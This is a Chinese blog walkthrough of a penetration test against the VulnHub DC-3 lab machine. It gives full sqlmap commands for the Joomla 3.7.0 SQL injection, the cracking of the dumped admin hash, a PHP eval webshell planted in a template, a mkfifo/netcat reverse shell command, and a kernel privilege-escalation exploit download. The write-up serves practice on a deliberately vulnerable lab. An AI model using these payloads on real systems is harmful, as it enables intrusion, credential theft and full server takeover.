记对VnlnHub_DC-3的一次渗透测试

于 2024-06-24 15:27:34 发布
阅读量832 收藏 20
点赞数 9
文章标签: 渗透测试 vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32277727/article/details/139927694
版权

VulnHub_DC-3 渗透测试笔记

攻击前准备

DC-3虚拟机文件夹压缩包

链接:https://pan.baidu.com/s/1kZ9RNflZSmV4Vr2UmyMA1g
提取码:d9cz
–来自百度网盘超级会员V6的分享

1.若出现报错提醒:

image-20231230164930676

2.选择编辑虚拟机设置后,移除CD/DVD

image-20231230165021070

3.修改网卡为NAT模式

image-20231230165051590

4.成功进入DC-3

image-20231230165142590

信息收集

1.扫描同网段主机IP

arp-scan -l

image-20231230165612793

2.深度扫描靶机IP

nmap -T4 -A -p 0-65535 10.10.10.4
扫描出80端口开放

image-20231230170200266

3.访问目标靶机的网站主页

image-20231230170301750

4.利用dirb扫描url

dirb http://10.10.10.4

image-20231230170612890

5.扫描出后台管理页面,直接访问

http://10.10.10.4/administrator/

发现网页是由Joomla的CMS框架搭建

image-20231230170747717

6.使用joomscan扫描目标url

(JoomScan):是一个开源项目,旨在自动执行Joomla CMS部署中的漏洞检测和可靠性保证任务。该工具在Perl中实现,可以无缝轻松地扫描Joomla安装,同时通过其轻量级和模块化架构留下最小的占地面积。它不仅可以检测已知的攻击性漏洞,还能够检测到许多错误配置和管理员级别的缺陷,这些缺陷可被攻击者利用来破坏系统。

常用工具篇 ]渗透神器OWASPJoomScan安装使用详解-CSDN博客

joomscan -u http://10.10.10.4

扫描结果:

Joomla版本: 3.7.0

后台管理页面: http://10.10.10.4/administrator/

image-20231230171555822

SQL注入漏洞

超详细SQLMap使用攻略及技巧分享 - 锦瑟,无端 - 博客园 (cnblogs.com)

1.在sploitdb中搜索3.7.0版本的joomla

searchsploit joomla 3.7.0

image-20231230172020230

2.查询漏洞说明所在位置

find / -name 42033.txt

image-20231230172845006

3.查看漏洞说明

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

#url漏洞点复现
URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27

#利用Sqlmap攻击漏洞语句
Using Sqlmap:
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
#localhost处替换为靶机IP

image-20231230173208739

4.URL漏洞点复现

image-20231230173705738

5.利用Sqlmap进行漏洞攻击

爆破数据库
sqlmap.bat -u "http://10.10.10.4/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

image-20231230175710665

输入Y

在GET参数'list[fullordering]'上测试SQL注入,看起来后端DBMS是“MySQL”。是否要跳过特定于其他DBMS的测试有效负载?[Y/n]

image-20231230175516646

输入N

GET参数'list[fullordering]'易受攻击。你想继续测试其他人(如果有的话)吗?[是/否]

image-20231230175535330

成功爆破出joomladb

image-20231230175643279

爆破数据表
sqlmap.bat -u "http://10.10.10.4/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

image-20231230180238749

image-20231230180205585

猜测以下两个数据表可能存放用户名密码

image-20231230180322209

image-20231230180349408

#__users表存放用户名密码可能性更大
爆破字段
sqlmap.bat -u "http://10.10.10.4/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --columns -p list[fullordering]

注意:"#__users" 此处有引号,防止后面语句被注释

image-20231230180630641

输入y,确认使用

[18:05:44][警告]无法检索数据库'joomladb'中表'#__users'的列名
是否要使用公共列存在性检查?[y/N/q]y

image-20231230181505231

键入回车键,使用默认字典即可

[18:05:50][警告]如果出现连续的数据检索问题,建议您尝试切换“--no cast”或切换“--hex”
您想使用哪个常用列(单词列表)文件?
[1] 默认“D:\Global\apps\sqlmap\1.7.9\data\txt\common columns.txt”(按Enter键)
[2] 自定义
>

image-20231230181635709

成功爆破出username跟password

image-20231230180732481

爆破表数据
sqlmap.bat -u "http://10.10.10.4/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C "username,password" --dump -p list[fullordering]

image-20231230182023895

成功爆破出用户名密码

username:  admin 
password:                             $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
#发现密码为hash值,且被加盐

image-20231230182121114

john破解密码

密码破解-john的使用 - Junglezt - 博客园 (cnblogs.com)

1.将哈希密码写入a.txt

image-20231230182403448

2.成功破解出明文

john a.txt

snoopy

image-20231230182501486

3.得出joomla后台管理页面用户名密码

用户名:admin
密码:snoopy

文件上传漏洞利用

1.利用破解的用户名密码登录后台管理页面

image-20231230182822021

成功登录网站后台

image-20231230182902918

2.进入网站拓展页面

Extensions-Templates-Templates

image-20231230183031205

3.点击Beez3 Details and Files进入模板

image-20231230183107615

4.点击New File,在模板里新建文件

image-20231230183350781

5.发现存在文件上传漏洞,且可上传php脚本文件,并创建shell.php文件

image-20231230183605727

6.写入一句话木马至shell.php,并点击Save保存

<?php @eval($_POST[cmd]); ?>
注意:"cmd" 即为蚁剑连接密码

image-20231230183725170

7.通过百度得知joomla上传文件路径,并访问shell.php

返回页面为空,说明木马已经在服务器成功运行
10.10.10.4/templates/beez3/shell.php

image-20231230183944160

获取WebShell

1.通过蚁剑连接,成功获取网站WebShell

image-20231230184036941

2.进入虚拟终端

image-20231230184751016

获取到www-data权限

image-20231230184841179

反弹Shell

反弹Shell原理及检测技术研究 - 郑瀚Andrew - 博客园 (cnblogs.com)

1.打开NetCat(瑞士军刀)

Linux 命令(138)—— nc 命令-腾讯云开发者社区-腾讯云 (tencent.com)

image-20231230185251347

2.查看当前目录下文件,发现nc.exe与nc64.exe

image-20231230185341645

3.nc开启监听6666端口,如有防火墙警报,点允许访问即可

nc64.exe -lvvp 6666

image-20231230185519816

4.输入反弹Shell命令

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.17 6666 >/tmp/f

image-20231230190441414

成功获取反弹Shell

image-20231230233740541

5.获取交互式Shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

image-20231230233412417

权限提升(内核漏洞)

权限提升(内核漏洞)脚本下载链接

链接:https://pan.baidu.com/s/1xBHJ41gH72D_SDlGuEfUvQ?pwd=3ufi
提取码:3ufi
–来自百度网盘超级会员V3的分享

###请下载后再进行后续操作

1.通过蚁剑上传内核漏洞检测脚本到/tmp目录

image-20231230192804672

2.在shell中查看已成功上传,但是没有执行权限

image-20231230192920362

3.添加执行权限

chmod 777 linux-exploit-suggester.sh

image-20231230193029921

4.执行漏洞检测脚本

./linux-exploit-suggester.sh
或者
bash linux-exploit-suggester.sh

image-20231230193124569

发现存在很多漏洞

image-20231230193204480

5.利用CVE-2016-4557高危漏洞

image-20231230193903747

#下载链接
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip

6.通过蚁剑上传至/tmp目录

image-20231230194132337

上传成功

image-20231230194249994

7.解压文件

unzip 39772.zip

image-20231230194304842

8.进入目录

#移动至39772
#解压exploit.tar文件
#移动至ebpf_mapfd_doubleput_exploit

cd 39772
tar -vxf exploit.tar
cd ebpf_mapfd_doubleput_exploit

image-20231230194550122

9.查看目录下的文件,发现需要执行的文件没有执行权限

image-20231230194927619

10.添加执行权限

chmod 777 compile.sh
chmod 777 doubleput.c

image-20231230195101508

11.运行相关文件

image-20231230195405514

成功提权至root

image-20231230195512766

12.cd到/root目录,发现flag

image-20231230195643717

13.cat查看flag

image-20231230195716441

flag
 __        __   _ _   ____                   _ _ _ _
 \ \      / /__| | | |  _ \  ___  _ __   ___| | | | |
  \ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
   \ V  V /  __/ | | | |_| | (_) | | | |  __/_|_|_|_|
    \_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)
Congratulations are in order.  :-)
I hope you've enjoyed this challenge as I enjoyed making it.
If there are any ways that I can improve these little challenges,
please let me know.
As per usual, comments and complaints can be sent via Twitter to @DCAU7
Have a great day!!!!

#祝贺按顺序排列。:-),我希望你和我一样喜欢这个挑战。如果有什么方法可以改善这些小挑战,请告诉我。和往常一样,评论和投诉可以通过推特发送到@DCAU7。祝你有美好的一天!!!!
黑战士安全
关注
  • 9
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
渗透测试实验_DC-9 靶机渗透
weixin_47133613的博客
05-04 4486
文章目录1. 安装靶机2. 使用kali linux 进行信息收集2.1 发现主机(靶机)2.2 目标主机端口扫描3. 启动BurpSuite4. 挖掘漏洞4.1 访问HTTP服务4.2 sqlmap 注入4.2.1 获取数据库信息4.2.2 获取Staff库中表名4.2.3 获取Staff库中Users表的列名4.2.4 获取Staff库中Users表的username和password数据4.2.5 获取Staff库中StaffDetails表的列名4.2.6 获取Staff库中StaffDetail
DC-1靶机渗透测试详细教程
啊醒的博客
05-04 5289
DC靶机系列渗透教程
DC-4靶机渗透测试详细教程
啊醒的博客
05-04 3605
DC-4靶机渗透测试详细教程
渗透测试学习之靶机DC-3
xdbzdgx的博客
11-12 4368
1.下载靶机 本篇文章是DC靶机系列的第三篇,针对的是靶机DC-3,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-3的下载地址为DC: 3.2 ~ VulnHub。三个地址建议使用磁力下载,比较快。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 需要说明的是DC-3相较前两个靶机,它只有一个flag,便是最后一个flag,没有多余的提示了。 在VMware加载成功之后显示如下界面: 默.
DC-5靶机渗透测试详细教程
啊醒的博客
05-04 6682
DC-5靶机渗透测试详细教程
DC-9靶机渗透测试详细教程
啊醒的博客
05-04 2699
DC-8靶机渗透测试详细教程
渗透测试-靶机DC-1-知识点总结
qq_38678845的博客
01-11 2633
渗透测试靶机DC-1的知识点总结
2022春节一次完整的渗透测试-DC-3
保持微笑的博客
02-06 3407
DC靶场的下载、安装与访问在上一篇的文章中。2022-渗透测试-DC靶场的下载、安装与访问_保持微笑的博客-CSDN博客https://blog.csdn.net/qq_38612882/article/details/122779202 靶场攻略: 1、使用nmap快速扫描的命令: nmap -sP --min-hostgroup 1024 --min-parallelism 1024 192.168.120.0/24 识别到靶场主机ip 2.使用命令: nmap -A -p- -T4 1.
DC-2靶机渗透测试
热门推荐
qq_33163046的博客
12-22 1万+
攻击机 kali-linux-2020.4-vbox-i386 设置 USB设备关闭,网络连接方式仅主机(Host-Only)网络。 攻击机IP 192.168.56.103 步骤1 靶机目标发现 因为靶机和攻击机在同一个网络内,所以使用KALI上arp-scan -l 进行扫描。扫描确定了靶机的IP是192.168.56.104。 ┌──(root??kali)-[/etc] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 0...
渗透测试学习之靶机DC-5
xdbzdgx的博客
11-18 5547
1.下载靶机 本篇文章是DC靶机系列的第五篇,针对的是靶机DC-5,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-5的下载地址为DC: 5 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 同样地,DC-5只有一个flag。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到roo.
DC-DCboostconverter.rar_Boost_DC DC BOOST_dc-dc boost_dc/dc 程序_电
07-14
本程序是以matlab为仿真平台,搭建的DC-DC Boost converter。对学习电力电子的同学有帮助。
SPDC-TR.zip_DC-DC测试_测试台 CAN_电源老化
09-24
这是DC/DC电源模块老化测试台的下位机程序,包含上下位机通讯协议。主控为51单片机,C语言,CAN通讯,非常有用。
DC_AC_dc-ac_dooral3_PSCAD_AC-DC_
09-29
pscad
Buck_PWM.rar_ buck converters._DC-DC_DC-DC matlab pwm_DC-DC buc
07-13
Switching-mode DC-DC buck converters
双向DC-DC原理图及STC程序.rar_DC-DC原理图_STC_dc-dc程序_rangepxe_双向DC 程序
07-14
2015 electronic design competition, two-way dc-cd converter and STC program
Dijkstra算法的详细介绍
最新发布
06-28
dijkstra算法
Matlab通信原理-QPSK数字通信系统的仿真
06-28
信源为随机产生的0/1序列; 8倍过采样;画出发送序列时域波形和频谱。 进行根升余弦成型滤波,画出滤波后的时域波形及频谱图。 信道加入高斯白噪声:接收端匹配滤波,下采样后判决。画出接收端各处的时域波形和频谱。 改变信号和噪声功率的相对大小,观察并分析误码率的变化。画出误码率随信噪比变化的曲线。 详见:https://mp.weixin.qq.com/s/v91q-ruSoYmBVeqtis34tw
搜索引擎 PHP源码 免费开源
06-28
搜索引擎开源 易搜是一个性能极佳的搜索引擎,免费开源 易搜采用自主研发的 BiuSQL 数据库储存数据,不需要安装数据库,下载源码解压缩即可使用 项目文件结构 > ./css -文件夹-储存CSS渲染资源<br> ./help -文件夹-易搜的使用帮助和申明事件<br> ./img -文件夹-用来储存易搜图片文件<br> ./js -文件夹-储存JavaScript脚本资源<br> ./s -文件夹-易搜搜索功能核心算法<br> ./console -文件夹-易搜控制台<br> ./备份 -文件夹-易搜开发以及版本备份储存<br> ./index.php -文件-易搜首页初始化文件<br> ./verification.html -文件-易搜验证以及防攻击文件<br> ./项目结构 -文件-项目结构文件<br>
机器学习作业基于 Python 的历史照片EXIF元数据 GIS机器学习分析源码+项目说明.zip
06-28
机器学习作业基于 Python 的历史照片EXIF元数据 GIS机器学习分析源码+项目说明.zip 机器学习作业基于 Python 的历史照片EXIF元数据 GIS机器学习分析源码+项目说明.zip 机器学习作业基于 Python 的历史照片EXIF元数据 GIS机器学习分析源码+项目说明.zip 适用目标:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业或毕业设计,作为“参考资料”使用。
docplex.mp.utils.DOcplexException: Unsupported operation: -1383000b_0_0-1383000b_0_1-1383000b_0_2-1383000b_0_3-1978000b_1_0-1978000b_1_1-1978000b_1_2-1978000b_1_3-494000b_2_0-494000b_2_1-494000b_2_2-494000b_2_3-3141000b_3_0-3141000b_3_1-3141000b_3_2-3141000b_3_3-1189000b_4_0-1189000b_4_1-1189000b_4_2-1189000b_4_3-6118000b_5_0-6118000b_5_1-6118000b_5_2-6118000b_5_3+14303000 + [<generator object <genexpr> at 0x000001CD837CDEC8>, <generator object <genexpr> at 0x000001CD8385DC48>, <generator object <genexpr> at 0x000001CD8385DCC8>, <generator object <genexpr> at 0x000001CD8385DD48>]
06-03
这个错误通常是由于在构建模型时,使用了...另外,你也可以检查一下代码中是否存在其他不支持的操作或类型,可能需要对代码进行调整或修改。 如果还有问题,可以提供更多的代码和错误信息,我可以帮你更好地解决问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑战士安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值